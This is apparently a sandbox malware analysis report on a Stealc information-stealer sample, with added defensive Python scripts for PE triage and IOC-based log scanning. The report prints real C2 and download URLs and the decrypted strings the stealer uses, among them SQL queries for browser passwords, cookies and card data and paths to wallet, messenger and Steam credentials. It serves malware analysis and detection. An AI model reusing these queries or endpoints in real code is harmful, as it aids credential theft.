

Windows Analysis Report
7Y18r(193).exe

Overview

General Information

Sample name: 7Y18r(193).exe
Analysis ID: 1482727
MD5: 3a085e2c496b3d2020401c3452b57aef
SHA1: 09754968722731fb208ddbebcc6c6a7cc9d42c7b
SHA256: ba12343f978332fa8c76a99e384a9052b0f9ecc1bcf24bd25552832af77a03ef
Tags: exe, Worm, Ramnit

Detection

Bdaejec, Stealc
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Antivirus detection for dropped file
Detected unpacking (changes PE section rights)
Detected unpacking (overwrites its own PE header)
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Yara detected Bdaejec
Yara detected Stealc
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found evasive API chain (may stop execution after checking locale)
Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors)
Infects executable files (exe, dll, sys, html)
Machine Learning detection for dropped file
Machine Learning detection for sample
PE file contains section with special chars
PE file has a writeable .text section
Sample uses string decryption to hide its real strings
Uses known network protocols on non-standard ports
AV process strings found (often used to terminate AV products)
Contains functionality to dynamically determine API calls
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Entry point lies outside standard sections
Extensive use of GetProcAddress (often used to hide API calls)
Found decision node followed by non-executed suspicious APIs
Found dropped PE file which has not been started or loaded
Found evasive API chain (date check)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Installs a raw input device (often for capturing keystrokes)
One or more processes crash
PE file contains executable resources (Code or Archives)
PE file contains sections with non-standard names
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses the system / local time for branch decision (may execute only at specific dates)
Yara signature match
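
Three of the static signatures in the list above (PE file has a writeable .text section, entry point lies outside standard sections, PE file contains section with special chars / non-standard names) can be checked without detonating anything, which matters here because the file infector flagged in this report has touched installed host executables as well. The script below is an added example for this page, not Joe Security's signature code and not part of the report. It parses only the PE header fields those checks need, and the two images it examines are constructed in memory by `build_pe` (a clean layout and an infected-looking one); neither is the analysed sample, and the "outside standard sections" rule is an approximation of the sandbox's own.

```python
import struct

IMAGE_SCN_CNT_CODE    = 0x00000020
IMAGE_SCN_MEM_EXECUTE = 0x20000000
IMAGE_SCN_MEM_READ    = 0x40000000
IMAGE_SCN_MEM_WRITE   = 0x80000000
# Section names a stock MSVC/MinGW link produces; anything else gets a second look.
STANDARD_SECTIONS = {".text", ".rdata", ".data", ".idata", ".edata", ".rsrc",
                     ".reloc", ".pdata", ".bss", ".tls", ".CRT"}


def parse_pe(pe: bytes):
    """Return (entry_point_rva, [(name, rva, size, characteristics), ...]).

    Pure struct parsing of the DOS header, COFF header, AddressOfEntryPoint
    and the section table; nothing else is needed for this triage.
    """
    if pe[:2] != b"MZ":
        raise ValueError("not an MZ executable")
    e_lfanew = struct.unpack_from("<I", pe, 0x3C)[0]
    if pe[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("PE signature not found")
    coff = e_lfanew + 4
    # COFF header: NumberOfSections at +2, SizeOfOptionalHeader at +16.
    num_sections, opt_size = struct.unpack_from("<H12xH", pe, coff + 2)
    # AddressOfEntryPoint sits at +16 of the optional header in PE32 and PE32+.
    entry = struct.unpack_from("<I", pe, coff + 20 + 16)[0]
    sections, off = [], coff + 20 + opt_size
    for _ in range(num_sections):
        name, vsize, rva, rawsize, *_rest, chars = struct.unpack_from("<8sIIIIIIHHI", pe, off)
        sections.append((name.rstrip(b"\0").decode("latin-1"), rva, max(vsize, rawsize), chars))
        off += 40
    return entry, sections


def triage(pe: bytes) -> list:
    """Static checks mirroring three of the sandbox signatures on this report."""
    entry, sections = parse_pe(pe)
    findings, ep_section = [], None
    for name, rva, size, chars in sections:
        if rva <= entry < rva + size:
            ep_section = name
        if name == ".text" and chars & IMAGE_SCN_MEM_WRITE:
            findings.append("writeable .text section")
        if name not in STANDARD_SECTIONS:
            findings.append(f"non-standard section name {name!r}")
        if any(not (0x20 < ord(c) < 0x7F) for c in name):
            findings.append(f"section name with special chars {name!r}")
    if ep_section is None:
        findings.append(f"entry point {entry:#x} outside every section")
    elif ep_section not in STANDARD_SECTIONS:
        findings.append(f"entry point {entry:#x} outside standard sections (in {ep_section!r})")
    return findings


def build_pe(sections, entry_point: int) -> bytes:
    """Constructed PE32 image (headers only, not loadable) for the checks above."""
    dos = bytearray(64)
    dos[:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, 64)               # e_lfanew
    opt = bytearray(224)                                # PE32 optional header size
    struct.pack_into("<H", opt, 0, 0x10B)               # PE32 magic
    struct.pack_into("<I", opt, 16, entry_point)        # AddressOfEntryPoint
    coff = struct.pack("<HHIIIHH", 0x14C, len(sections), 0, 0, 0, len(opt), 0x0102)
    table = b"".join(
        struct.pack("<8sIIIIIIHHI", name.encode("latin-1").ljust(8, b"\0"),
                    size, rva, size, 0, 0, 0, 0, 0, chars)
        for name, rva, size, chars in sections)
    return bytes(dos) + b"PE\0\0" + coff + bytes(opt) + table


RX = IMAGE_SCN_CNT_CODE | IMAGE_SCN_MEM_EXECUTE | IMAGE_SCN_MEM_READ
RW = IMAGE_SCN_MEM_READ | IMAGE_SCN_MEM_WRITE
RWX = RX | IMAGE_SCN_MEM_WRITE

CLEAN = build_pe([(".text", 0x1000, 0x1000, RX), (".data", 0x2000, 0x1000, RW)], 0x1200)
# Shape a file infector leaves behind: .text made writeable, an appended section
# with an unprintable name, and the entry point redirected into it.
INFECTED = build_pe([(".text", 0x1000, 0x1000, RWX), (".data", 0x2000, 0x1000, RW),
                     ("\x01\x02.x", 0x3000, 0x800, RWX)], 0x3010)

if __name__ == "__main__":
    import sys
    targets = [open(p, "rb").read() for p in sys.argv[1:]] or [CLEAN, INFECTED]
    for image in targets:
        print(triage(image) or "no findings")
```

Pass real files on the command line to run it against a host. Treat hits as triage signals rather than verdicts: packers and some non-MSVC toolchains legitimately emit non-standard section names, whereas a writeable .text section on an otherwise stable installer binary (the 7-Zip and AutoIt files flagged under AV Detection are the kind of victim this report shows) is the stronger indicator.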

Classification

  • System is w10x64
  • 7Y18r(193).exe (PID: 7472 cmdline: "C:\Users\user\Desktop\7Y18r(193).exe" MD5: 3A085E2C496B3D2020401C3452B57AEF)
    • WuiXLS.exe (PID: 7496 cmdline: C:\Users\user\AppData\Local\Temp\WuiXLS.exe MD5: F7D21DE5C4E81341ECCD280C11DDCC9A)
      • WerFault.exe (PID: 7724 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 7496 -s 1488 MD5: C31336C1EFC2CCB44B4326EA793040F2)
    • WerFault.exe (PID: 7832 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 7472 -s 528 MD5: C31336C1EFC2CCB44B4326EA793040F2)
  • cleanup
Name: Stealc
Description: Stealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as a Malware-as-a-Service since January 9, 2023. According to Plymouth's statement, Stealc is a non-resident stealer with flexible data collection settings, and its development builds on other prominent stealers: Vidar, Raccoon, Mars and Redline. Stealc is written in C and uses WinAPI functions. It mainly targets data from web browsers, browser extensions and desktop cryptocurrency wallet applications, and from other applications (messengers, email clients, etc.). The malware downloads seven legitimate third-party DLLs to collect sensitive data from web browsers: sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll. It then exfiltrates the collected information file by file to its C2 server using HTTP POST requests.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.stealc
{"C2 url": "http://bernardofata.icu/40d570f44e84a454.php"}
Yara matches in memory dumps (Source | Rule | Description | Author, matched strings indented):
00000000.00000002.1511542856.0000000000890000.00000040.00001000.00020000.00000000.sdmp | JoeSecurity_Stealc_2 | Yara detected Stealc | Joe Security
00000000.00000002.1511542856.0000000000890000.00000040.00001000.00020000.00000000.sdmp | Windows_Trojan_Smokeloader_3687686f | unknown | unknown
  0x30d:$a: 0C 8B 45 F0 89 45 C8 8B 45 C8 8B 40 3C 8B 4D F0 8D 44 01 04 89
00000000.00000003.1457369500.0000000002430000.00000004.00001000.00020000.00000000.sdmp | JoeSecurity_Stealc_2 | Yara detected Stealc | Joe Security
00000000.00000002.1511687586.00000000008E2000.00000040.00000020.00020000.00000000.sdmp | Windows_Trojan_RedLineStealer_ed346e4c | unknown | unknown
  0x3d49:$a: 55 8B EC 8B 45 14 56 57 8B 7D 08 33 F6 89 47 0C 39 75 10 76 15 8B
00000000.00000002.1511164621.0000000000400000.00000040.00000001.01000000.00000003.sdmp | JoeSecurity_Stealc_2 | Yara detected Stealc | Joe Security
(3 further entries not shown)

Yara matches in unpacked PEs (Source | Rule | Description | Author):
0.3.7Y18r(193).exe.2430000.0.raw.unpack | JoeSecurity_Stealc_2 | Yara detected Stealc | Joe Security
0.2.7Y18r(193).exe.890e67.1.raw.unpack | JoeSecurity_Stealc_2 | Yara detected Stealc | Joe Security
0.2.7Y18r(193).exe.400000.0.raw.unpack | JoeSecurity_Stealc_2 | Yara detected Stealc | Joe Security
0.2.7Y18r(193).exe.400000.0.unpack | JoeSecurity_Stealc_2 | Yara detected Stealc | Joe Security
0.2.7Y18r(193).exe.890e67.1.unpack | JoeSecurity_Stealc_2 | Yara detected Stealc | Joe Security
(2 further entries not shown)
                  No Sigma rule has matched
                  No Snort rule has matched
IDS alerts (timestamp, SID, protocol, source port -> destination port, classtype):
2024-07-26T02:51:47.771172+0200  SID 2022930  TCP  443 -> 49712   A Network Trojan was detected
2024-07-26T02:51:33.974086+0200  SID 2807908  TCP  49705 -> 799   Malware Command and Control Activity Detected
2024-07-26T02:52:25.910942+0200  SID 2022930  TCP  443 -> 51996   A Network Trojan was detected
2024-07-26T02:51:31.550495+0200  SID 2838522  UDP  54441 -> 53    Malware Command and Control Activity Detected
2024-07-26T02:51:30.550429+0200  SID 2838522  UDP  54441 -> 53    Malware Command and Control Activity Detected
2024-07-26T02:51:33.550629+0200  SID 2838522  UDP  54441 -> 53    Malware Command and Control Activity Detected
2024-07-26T02:51:29.552802+0200  SID 2838522  UDP  54441 -> 53    Malware Command and Control Activity Detected
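
The alerts above cover three behaviours that the signature list also names: UDP/53 traffic classed as C2 activity (SID 2838522), plaintext HTTP to TCP/799 (SID 2807908, matching the ddos.dnsnb8.net:799 download URL under AV Detection and "Uses known network protocols on non-standard ports"), and traffic from TCP/443 back to the client (SID 2022930; the source port is 443, so that rule matched the server's response, not the request). The scanner below is an added example for this page, not part of the report and not Joe Security or Suricata code. It applies the same ideas to HTTP event records: the records are constructed in the shape of Suricata EVE http events, the two hostnames and the C2 path are taken from this report, and the timestamps, user agent and RFC 5737 addresses are invented.

```python
import json
import re

# Indicators from this report: the Stealc C2 host from the extracted
# configuration and the download host from the URL-reputation hits.
IOC_DOMAINS = {"bernardofata.icu", "ddos.dnsnb8.net"}
# Ports where plaintext HTTP is expected; anything else is "known protocol on
# a non-standard port", the behaviour behind the TCP/799 alert.
HTTP_PORTS = {80, 8080}
# Shape of the C2 path in this sample's configuration: 16 hex characters + .php.
C2_PATH = re.compile(r"^/[0-9a-f]{16}\.php$")

# Constructed records in the shape of Suricata EVE "http" events (not real traffic).
EVENTS = """\
{"timestamp": "2024-07-26T02:51:20.000000+0200", "event_type": "http", "src_ip": "192.0.2.10", "dest_ip": "198.51.100.20", "dest_port": 80, "http": {"hostname": "example.com", "url": "/", "http_method": "GET", "http_user_agent": "Mozilla/5.0"}}
{"timestamp": "2024-07-26T02:51:34.000000+0200", "event_type": "http", "src_ip": "192.0.2.10", "dest_ip": "203.0.113.7", "dest_port": 799, "http": {"hostname": "ddos.dnsnb8.net", "url": "/cj//k1.rar", "http_method": "GET", "http_user_agent": "Mozilla/5.0"}}
{"timestamp": "2024-07-26T02:51:50.000000+0200", "event_type": "http", "src_ip": "192.0.2.10", "dest_ip": "203.0.113.9", "dest_port": 80, "http": {"hostname": "bernardofata.icu", "url": "/40d570f44e84a454.php", "http_method": "POST", "http_user_agent": "Mozilla/5.0"}}
{"timestamp": "2024-07-26T02:52:01.000000+0200", "event_type": "http", "src_ip": "192.0.2.10", "dest_ip": "198.51.100.21", "dest_port": 80, "http": {"hostname": "example.org", "url": "/login.php", "http_method": "POST", "http_user_agent": "Mozilla/5.0"}}
"""


def classify(event: dict) -> list:
    """Return the findings for one EVE record (empty list when nothing matches)."""
    if event.get("event_type") != "http":
        return []
    http = event.get("http", {})
    host = (http.get("hostname") or "").lower().rstrip(".")
    url = http.get("url") or ""
    findings = []
    # Exact match or any subdomain of a known-bad name.
    if any(host == d or host.endswith("." + d) for d in IOC_DOMAINS):
        findings.append(f"known C2/download host {host}")
    port = event.get("dest_port")
    if port not in HTTP_PORTS:
        findings.append(f"HTTP on non-standard port {port}")
    # Stealc exfiltrates with HTTP POST; the path shape comes from the config above.
    if http.get("http_method") == "POST" and C2_PATH.match(url):
        findings.append(f"Stealc-style C2 path {url}")
    return findings


def scan(eve_lines: str) -> list:
    """Run classify() over newline-delimited EVE JSON; return (timestamp, dest_ip, findings)."""
    hits = []
    for line in eve_lines.splitlines():
        if not line.strip():
            continue
        event = json.loads(line)
        findings = classify(event)
        if findings:
            hits.append((event["timestamp"], event["dest_ip"], findings))
    return hits


if __name__ == "__main__":
    for ts, ip, findings in scan(EVENTS):
        print(ts, ip, "; ".join(findings))
```

The TLS exchange on 443 that produced the 2022930 alerts carries no Host header or URL, so nothing in `classify` can see it; that is why the UDP/53 alerts and the non-standard-port rule are worth keeping. If your feed includes EVE dns records, the same `IOC_DOMAINS` set applied to `event_type == "dns"` covers the resolution step.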


                  AV Detection

Source: 7Y18r(193).exe | Avira: detected
Source: http://ddos.dnsnb8.net/ | URL Reputation: Label: malware
Source: http://ddos.dnsnb8.net:799/cj//k1.rar | URL Reputation: Label: malware
Source: http://bernardofata.icu/40d570f44e84a454.php | Avira URL Cloud: Label: malware
Source: http://ddos.dnsnb8.net:799/cj//k1.rarq | Avira URL Cloud: Label: malware
Source: http://ddos.dnsnb8.net:799/cj//k1.rarp | Avira URL Cloud: Label: phishing
Source: http://ddos.dnsnb8.net:799/cj//k1.rarH | Avira URL Cloud: Label: phishing
Source: http://ddos.dnsnb8.net:799/cj//k1.rarn.= | Avira URL Cloud: Label: phishing
Source: C:\Program Files\7-Zip\Uninstall.exe | Avira: detection malicious, Label: W32/Jadtre.B
Source: C:\Program Files (x86)\AutoIt3\Examples\Helpfile\Extras\MyProg.exe | Avira: detection malicious, Label: W32/Jadtre.B
Source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe | Avira: detection malicious, Label: W32/Jadtre.B
Source: C:\Users\user\AppData\Local\Temp\WuiXLS.exe | Avira: detection malicious, Label: TR/Dldr.Small.Z.haljq
Source: 00000000.00000003.1457369500.0000000002430000.00000004.00001000.00020000.00000000.sdmp | Malware Configuration Extractor: StealC {"C2 url": "http://bernardofata.icu/40d570f44e84a454.php"}
Source: C:\Users\user\AppData\Local\Temp\WuiXLS.exe | ReversingLabs: Detection: 92%
Source: 7Y18r(193).exe | ReversingLabs: Detection: 95%
Source: 7Y18r(193).exe | Virustotal: Detection: 93%
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 100.0% probability
Source: C:\Program Files\7-Zip\Uninstall.exe | Joe Sandbox ML: detected
Source: C:\Program Files (x86)\AutoIt3\Examples\Helpfile\Extras\MyProg.exe | Joe Sandbox ML: detected
Source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe | Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\WuiXLS.exe | Joe Sandbox ML: detected
Source: 7Y18r(193).exe | Joe Sandbox ML: detected
Source: 0.3.7Y18r(193).exe.2430000.0.raw.unpack | String decryptor: recovered the following strings (one per line, in the order reported):
  GetProcAddress
  LoadLibraryA
  lstrcatA
  OpenEventA
  CreateEventA
  CloseHandle
  Sleep
  GetUserDefaultLangID
  VirtualAllocExNuma
  VirtualFree
  GetSystemInfo
  VirtualAlloc
  HeapAlloc
  GetComputerNameA
  lstrcpyA
  GetProcessHeap
  GetCurrentProcess
  lstrlenA
  ExitProcess
  GlobalMemoryStatusEx
  GetSystemTime
  SystemTimeToFileTime
  advapi32.dll
  gdi32.dll
  user32.dll
  crypt32.dll
  ntdll.dll
  GetUserNameA
  CreateDCA
  GetDeviceCaps
  ReleaseDC
  CryptStringToBinaryA
  sscanf
  VMwareVMware
  HAL9TH
  JohnDoe
  DISPLAY
  %hu/%hu/%hu
  http://bernardofata.icu
  /40d570f44e84a454.php
  /2a7743b8bbd7e4a7/
  default
  GetEnvironmentVariableA
  GetFileAttributesA
  GlobalLock
  HeapFree
  GetFileSize
  GlobalSize
  CreateToolhelp32Snapshot
  IsWow64Process
  Process32Next
  GetLocalTime
  FreeLibrary
  GetTimeZoneInformation
  GetSystemPowerStatus
  GetVolumeInformationA
  GetWindowsDirectoryA
  Process32First
  GetLocaleInfoA
  GetUserDefaultLocaleName
  GetModuleFileNameA
  DeleteFileA
  FindNextFileA
  LocalFree
  FindClose
  SetEnvironmentVariableA
  LocalAlloc
  GetFileSizeEx
  ReadFile
  SetFilePointer
  WriteFile
  CreateFileA
  FindFirstFileA
  CopyFileA
  VirtualProtect
  GetLogicalProcessorInformationEx
  GetLastError
  lstrcpynA
  MultiByteToWideChar
  GlobalFree
  WideCharToMultiByte
  GlobalAlloc
  OpenProcess
  TerminateProcess
  GetCurrentProcessId
  gdiplus.dll
  ole32.dll
  bcrypt.dll
  wininet.dll
  shlwapi.dll
  shell32.dll
  psapi.dll
  rstrtmgr.dll
  CreateCompatibleBitmap
  SelectObject
  BitBlt
  DeleteObject
  CreateCompatibleDC
  GdipGetImageEncodersSize
  GdipGetImageEncoders
  GdipCreateBitmapFromHBITMAP
  GdiplusStartup
  GdiplusShutdown
  GdipSaveImageToStream
  GdipDisposeImage
  GdipFree
  GetHGlobalFromStream
  CreateStreamOnHGlobal
  CoUninitialize
  CoInitialize
  CoCreateInstance
  BCryptGenerateSymmetricKey
  BCryptCloseAlgorithmProvider
  BCryptDecrypt
  BCryptSetProperty
  BCryptDestroyKey
  BCryptOpenAlgorithmProvider
  GetWindowRect
  GetDesktopWindow
  GetDC
  CloseWindow
  wsprintfA
  EnumDisplayDevicesA
  GetKeyboardLayoutList
  CharToOemW
  wsprintfW
  RegQueryValueExA
  RegEnumKeyExA
  RegOpenKeyExA
  RegCloseKey
  RegEnumValueA
  CryptBinaryToStringA
  CryptUnprotectData
  SHGetFolderPathA
  ShellExecuteExA
  InternetOpenUrlA
  InternetConnectA
  InternetCloseHandle
  InternetOpenA
  HttpSendRequestA
  HttpOpenRequestA
  InternetReadFile
  InternetCrackUrlA
  StrCmpCA
  StrStrA
  StrCmpCW
  PathMatchSpecA
  GetModuleFileNameExA
  RmStartSession
  RmRegisterResources
  RmGetList
  RmEndSession
  sqlite3_open
  sqlite3_prepare_v2
  sqlite3_step
  sqlite3_column_text
  sqlite3_finalize
  sqlite3_close
  sqlite3_column_bytes
  sqlite3_column_blob
  encrypted_key
  PATH
  C:\ProgramData\nss3.dll
  NSS_Init
  NSS_Shutdown
  PK11_GetInternalKeySlot
  PK11_FreeSlot
  PK11_Authenticate
  PK11SDR_Decrypt
  C:\ProgramData\
  SELECT origin_url, username_value, password_value FROM logins
  browser:
  profile:
  url:
  login:
  password:
  Opera
  OperaGX
  Network
  cookies
  .txt
  SELECT HOST_KEY, is_httponly, path, is_secure, (expires_utc/1000000)-11644480800, name, encrypted_value from cookies
  TRUE
  FALSE
  autofill
  SELECT name, value FROM autofill
  history
  SELECT url FROM urls LIMIT 1000
  SELECT name_on_card, expiration_month, expiration_year, card_number_encrypted FROM credit_cards
  name:
  month:
  year:
  card:
  Cookies
  Login Data
  Web Data
  History
  logins.json
  formSubmitURL
  usernameField
  encryptedUsername
  encryptedPassword
  guid
  SELECT host, isHttpOnly, path, isSecure, expiry, name, value FROM moz_cookies
  SELECT fieldname, value FROM moz_formhistory
  SELECT url FROM moz_places LIMIT 1000
  cookies.sqlite
  formhistory.sqlite
  places.sqlite
  plugins
  Local Extension Settings
  Sync Extension Settings
  IndexedDB
  Opera Stable
  Opera GX Stable
  CURRENT
  chrome-extension_
  _0.indexeddb.leveldb
  Local State
  profiles.ini
  chrome
  opera
  firefox
  wallets
  %08lX%04lX%lu
  SOFTWARE\Microsoft\Windows NT\CurrentVersion
  ProductName
  x32
  x64
  %d/%d/%d %d:%d:%d
  HARDWARE\DESCRIPTION\System\CentralProcessor\0
  ProcessorNameString
  SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall
  DisplayName
  DisplayVersion
  Network Info:
  - IP: IP?
  - Country: ISO?
  System Summary:
                  Source: 0.3.7Y18r(193).exe.2430000.0.raw.unpackString decryptor: - HWID:
                  Source: 0.3.7Y18r(193).exe.2430000.0.raw.unpackString decryptor: - OS:
                  Source: 0.3.7Y18r(193).exe.2430000.0.raw.unpackString decryptor: - Architecture:
                  Source: 0.3.7Y18r(193).exe.2430000.0.raw.unpackString decryptor: - UserName:
                  Source: 0.3.7Y18r(193).exe.2430000.0.raw.unpackString decryptor: - Computer Name:
                  Source: 0.3.7Y18r(193).exe.2430000.0.raw.unpackString decryptor: - Local Time:
                  Source: 0.3.7Y18r(193).exe.2430000.0.raw.unpackString decryptor: - UTC:
                  Source: 0.3.7Y18r(193).exe.2430000.0.raw.unpackString decryptor: - Language:
                  Source: 0.3.7Y18r(193).exe.2430000.0.raw.unpackString decryptor: - Keyboards:
                  Source: 0.3.7Y18r(193).exe.2430000.0.raw.unpackString decryptor: - Laptop:
                  Source: 0.3.7Y18r(193).exe.2430000.0.raw.unpackString decryptor: - Running Path:
                  Source: 0.3.7Y18r(193).exe.2430000.0.raw.unpackString decryptor: - CPU:
                  Source: 0.3.7Y18r(193).exe.2430000.0.raw.unpackString decryptor: - Threads:
                  Source: 0.3.7Y18r(193).exe.2430000.0.raw.unpackString decryptor: - Cores:
                  Source: 0.3.7Y18r(193).exe.2430000.0.raw.unpackString decryptor: - RAM:
                  Source: 0.3.7Y18r(193).exe.2430000.0.raw.unpackString decryptor: - Display Resolution:
                  Source: 0.3.7Y18r(193).exe.2430000.0.raw.unpackString decryptor: - GPU:
                  Source: 0.3.7Y18r(193).exe.2430000.0.raw.unpackString decryptor: User Agents:
                  Source: 0.3.7Y18r(193).exe.2430000.0.raw.unpackString decryptor: Installed Apps:
                  Source: 0.3.7Y18r(193).exe.2430000.0.raw.unpackString decryptor: All Users:
                  Source: 0.3.7Y18r(193).exe.2430000.0.raw.unpackString decryptor: Current User:
                  Source: 0.3.7Y18r(193).exe.2430000.0.raw.unpackString decryptor: Process List:
                  Source: 0.3.7Y18r(193).exe.2430000.0.raw.unpackString decryptor: system_info.txt
                  Source: 0.3.7Y18r(193).exe.2430000.0.raw.unpackString decryptor: freebl3.dll
                  Source: 0.3.7Y18r(193).exe.2430000.0.raw.unpackString decryptor: mozglue.dll
                  Source: 0.3.7Y18r(193).exe.2430000.0.raw.unpackString decryptor: msvcp140.dll
                  Source: 0.3.7Y18r(193).exe.2430000.0.raw.unpackString decryptor: nss3.dll
                  Source: 0.3.7Y18r(193).exe.2430000.0.raw.unpackString decryptor: softokn3.dll
                  Source: 0.3.7Y18r(193).exe.2430000.0.raw.unpackString decryptor: vcruntime140.dll
                  Source: 0.3.7Y18r(193).exe.2430000.0.raw.unpackString decryptor: \Temp\
                  Source: 0.3.7Y18r(193).exe.2430000.0.raw.unpackString decryptor: .exe
                  Source: 0.3.7Y18r(193).exe.2430000.0.raw.unpackString decryptor: runas
                  Source: 0.3.7Y18r(193).exe.2430000.0.raw.unpackString decryptor: open
                  Source: 0.3.7Y18r(193).exe.2430000.0.raw.unpackString decryptor: /c start
                  Source: 0.3.7Y18r(193).exe.2430000.0.raw.unpackString decryptor: %DESKTOP%
                  Source: 0.3.7Y18r(193).exe.2430000.0.raw.unpackString decryptor: %APPDATA%
                  Source: 0.3.7Y18r(193).exe.2430000.0.raw.unpackString decryptor: %LOCALAPPDATA%
                  Source: 0.3.7Y18r(193).exe.2430000.0.raw.unpackString decryptor: %USERPROFILE%
                  Source: 0.3.7Y18r(193).exe.2430000.0.raw.unpackString decryptor: %DOCUMENTS%
                  Source: 0.3.7Y18r(193).exe.2430000.0.raw.unpackString decryptor: %PROGRAMFILES%
                  Source: 0.3.7Y18r(193).exe.2430000.0.raw.unpackString decryptor: %PROGRAMFILES_86%
                  Source: 0.3.7Y18r(193).exe.2430000.0.raw.unpackString decryptor: %RECENT%
                  Source: 0.3.7Y18r(193).exe.2430000.0.raw.unpackString decryptor: *.lnk
                  Source: 0.3.7Y18r(193).exe.2430000.0.raw.unpackString decryptor: files
                  Source: 0.3.7Y18r(193).exe.2430000.0.raw.unpackString decryptor: \discord\
                  Source: 0.3.7Y18r(193).exe.2430000.0.raw.unpackString decryptor: \Local Storage\leveldb\CURRENT
                  Source: 0.3.7Y18r(193).exe.2430000.0.raw.unpackString decryptor: \Local Storage\leveldb
                  Source: 0.3.7Y18r(193).exe.2430000.0.raw.unpackString decryptor: \Telegram Desktop\
                  Source: 0.3.7Y18r(193).exe.2430000.0.raw.unpackString decryptor: key_datas
                  Source: 0.3.7Y18r(193).exe.2430000.0.raw.unpackString decryptor: D877F783D5D3EF8C*
                  Source: 0.3.7Y18r(193).exe.2430000.0.raw.unpackString decryptor: map*
                  Source: 0.3.7Y18r(193).exe.2430000.0.raw.unpackString decryptor: A7FDF864FBC10B77*
                  Source: 0.3.7Y18r(193).exe.2430000.0.raw.unpackString decryptor: A92DAA6EA6F891F2*
                  Source: 0.3.7Y18r(193).exe.2430000.0.raw.unpackString decryptor: F8806DD0C461824F*
                  Source: 0.3.7Y18r(193).exe.2430000.0.raw.unpackString decryptor: Telegram
                  Source: 0.3.7Y18r(193).exe.2430000.0.raw.unpackString decryptor: Tox
                  Source: 0.3.7Y18r(193).exe.2430000.0.raw.unpackString decryptor: *.tox
                  Source: 0.3.7Y18r(193).exe.2430000.0.raw.unpackString decryptor: *.ini
                  Source: 0.3.7Y18r(193).exe.2430000.0.raw.unpackString decryptor: Password
                  Source: 0.3.7Y18r(193).exe.2430000.0.raw.unpackString decryptor: Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\
                  Source: 0.3.7Y18r(193).exe.2430000.0.raw.unpackString decryptor: Software\Microsoft\Office\13.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\
                  Source: 0.3.7Y18r(193).exe.2430000.0.raw.unpackString decryptor: Software\Microsoft\Office\14.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\
                  Source: 0.3.7Y18r(193).exe.2430000.0.raw.unpackString decryptor: Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\
                  Source: 0.3.7Y18r(193).exe.2430000.0.raw.unpackString decryptor: Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\
                  Source: 0.3.7Y18r(193).exe.2430000.0.raw.unpackString decryptor: oftware\Microsoft\Windows Messaging Subsystem\Profiles\9375CFF0413111d3B88A00104B2A6676\
                  Source: 0.3.7Y18r(193).exe.2430000.0.raw.unpackString decryptor: 00000001
                  Source: 0.3.7Y18r(193).exe.2430000.0.raw.unpackString decryptor: 00000002
                  Source: 0.3.7Y18r(193).exe.2430000.0.raw.unpackString decryptor: 00000003
                  Source: 0.3.7Y18r(193).exe.2430000.0.raw.unpackString decryptor: 00000004
                  Source: 0.3.7Y18r(193).exe.2430000.0.raw.unpackString decryptor: \Outlook\accounts.txt
                  Source: 0.3.7Y18r(193).exe.2430000.0.raw.unpackString decryptor: Pidgin
                  Source: 0.3.7Y18r(193).exe.2430000.0.raw.unpackString decryptor: \.purple\
                  Source: 0.3.7Y18r(193).exe.2430000.0.raw.unpackString decryptor: accounts.xml
                  Source: 0.3.7Y18r(193).exe.2430000.0.raw.unpackString decryptor: dQw4w9WgXcQ
                  Source: 0.3.7Y18r(193).exe.2430000.0.raw.unpackString decryptor: token:
                  Source: 0.3.7Y18r(193).exe.2430000.0.raw.unpackString decryptor: Software\Valve\Steam
                  Source: 0.3.7Y18r(193).exe.2430000.0.raw.unpackString decryptor: SteamPath
                  Source: 0.3.7Y18r(193).exe.2430000.0.raw.unpackString decryptor: \config\
                  Source: 0.3.7Y18r(193).exe.2430000.0.raw.unpackString decryptor: ssfn*
                  Source: 0.3.7Y18r(193).exe.2430000.0.raw.unpackString decryptor: config.vdf
                  Source: 0.3.7Y18r(193).exe.2430000.0.raw.unpackString decryptor: DialogConfig.vdf
                  Source: 0.3.7Y18r(193).exe.2430000.0.raw.unpackString decryptor: DialogConfigOverlay*.vdf
                  Source: 0.3.7Y18r(193).exe.2430000.0.raw.unpackString decryptor: libraryfolders.vdf
                  Source: 0.3.7Y18r(193).exe.2430000.0.raw.unpackString decryptor: loginusers.vdf
                  Source: 0.3.7Y18r(193).exe.2430000.0.raw.unpackString decryptor: \Steam\
                  Source: 0.3.7Y18r(193).exe.2430000.0.raw.unpackString decryptor: sqlite3.dll
                  Source: 0.3.7Y18r(193).exe.2430000.0.raw.unpackString decryptor: browsers
                  Source: 0.3.7Y18r(193).exe.2430000.0.raw.unpackString decryptor: done
